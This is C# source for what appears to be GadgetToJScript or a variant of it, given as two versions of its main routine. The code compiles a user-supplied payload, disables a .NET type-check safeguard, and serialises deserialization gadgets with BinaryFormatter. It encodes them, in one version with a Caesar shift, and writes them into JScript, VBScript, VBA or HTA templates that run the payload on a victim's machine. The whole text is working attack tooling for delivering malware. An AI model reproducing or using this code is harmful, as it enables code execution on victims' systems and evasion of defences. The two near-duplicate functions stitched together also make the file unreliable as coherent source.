static void Main() { string source; string template; using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("SourceCode")) { using (StreamReader sr = new StreamReader(stream)) { source = sr.ReadToEnd(); } } using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Template")) { using (StreamReader sr = new StreamReader(stream)) { template = sr.ReadToEnd(); } } ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true"); DisableTypeCheckGadgetGenerator dtcgg = new DisableTypeCheckGadgetGenerator(); MemoryStream stageOne = dtcgg.generateGadget(new MemoryStream()); template = template.Replace("%STAGE_1%", CaesarShift(Convert.ToBase64String(stageOne.ToArray()), 12)); template = template.Replace("%SIZE_OF_STAGE_1%", stageOne.Length.ToString()); Assembly assembly = InternalCompiler.compile(source); BinaryFormatter bf = new BinaryFormatter(); MemoryStream stageTwo = new MemoryStream(); SurrogateGadgetGenerator sgg = new SurrogateGadgetGenerator(assembly); bf.Serialize(stageTwo, sgg); template = template.Replace("%STAGE_2%", CaesarShift(Convert.ToBase64String(stageTwo.ToArray()), 12)); template = template.Replace("%SIZE_OF_STAGE_2%", stageTwo.Length.ToString()); File.WriteAllText(Path.Combine(Directory.GetCurrentDirectory(), Process.GetCurrentProcess().ProcessName + ".js"), template); }
static void Main(string[] args) { var show_help = false; OptionSet options = new OptionSet() { { "i|input=", "Input file, example: C:\\Users\\userX\\Desktop\\payload.cs", v => _inputFName = v }, { "r|references=", "Reference Assemblies, example: System.dll,System.IO.Compression.dll", v => _references = v }, { "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v }, { "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v }, { "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v }, { "f|regfree", "Registration-free activation of .NET based COM components", v => _regFree = v != null }, { "h|?|help", "Show Help", v => show_help = v != null }, }; try { options.Parse(args); if (show_help) { ShowHelp(options); return; } if (_wsh == "" || _outputFName == "" || _inputFName == "") { ShowHelp(options); return; } if (!Enum.IsDefined(typeof(EWSH), _wsh)) { ShowHelp(options); return; } if (!Enum.IsDefined(typeof(ENC), _enc)) { ShowHelp(options); return; } } catch (Exception e) { Console.Error.WriteLine(e.Message); ShowHelp(options); return; } string resourceName = ""; switch (_wsh) { case "js": if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; } else { resourceName = "GadgetToJScript.templates.jscript.template"; } break; case "vbs": resourceName = "GadgetToJScript.templates.vbscript.template"; break; case "vba": if (_enc == "b64") { resourceName = "GadgetToJScript.templates.vbascriptb64.template"; } else { resourceName = "GadgetToJScript.templates.vbascripthex.template"; } break; case "hta": resourceName = "GadgetToJScript.templates.htascript.template"; break; default: if (_regFree) { resourceName = "GadgetToJScript.templates.jscript-regfree.template"; } else { resourceName = "GadgetToJScript.templates.jscript.template"; } break; } MemoryStream _msStg1 = new MemoryStream(); DisableTypeCheckGadgetGenerator _disableTypCheckObj = new DisableTypeCheckGadgetGenerator(); _msStg1 = _disableTypCheckObj.GenerateGadget(_msStg1); ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true"); Assembly testAssembly = AssemblyLoader.Compile(_inputFName, _references); BinaryFormatter _formatterStg2 = new BinaryFormatter(); MemoryStream _msStg2 = new MemoryStream(); ASurrogateGadgetGenerator _gadgetStg = new ASurrogateGadgetGenerator(testAssembly); _formatterStg2.Serialize(_msStg2, _gadgetStg); Assembly assembly = Assembly.GetExecutingAssembly(); string _wshTemplate = ""; using (Stream stream = assembly.GetManifestResourceStream(resourceName)) { if (_wsh != "vba") { using (StreamReader reader = new StreamReader(stream)) { _wshTemplate = reader.ReadToEnd(); _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray())); _wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString()); _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray())); _wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString()); } } else { List <string> stage1Lines = new List <String>(); List <string> stage2Lines = new List <String>(); if (_enc == "b64") { stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList(); stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList(); } else { stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList(); stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList(); } StringBuilder _b1 = new StringBuilder(); _b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\""); _b1.AppendLine(); stage1Lines.RemoveAt(0); foreach (String line in stage1Lines) { _b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\""); _b1.AppendLine(); } StringBuilder _b2 = new StringBuilder(); _b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\""); _b2.AppendLine(); stage2Lines.RemoveAt(0); foreach (String line in stage2Lines) { _b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\""); _b2.AppendLine(); } using (StreamReader reader = new StreamReader(stream)) { _wshTemplate = reader.ReadToEnd(); _wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString()); _wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString()); } } } using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh)) { _generatedWSH.WriteLine(_wshTemplate); } }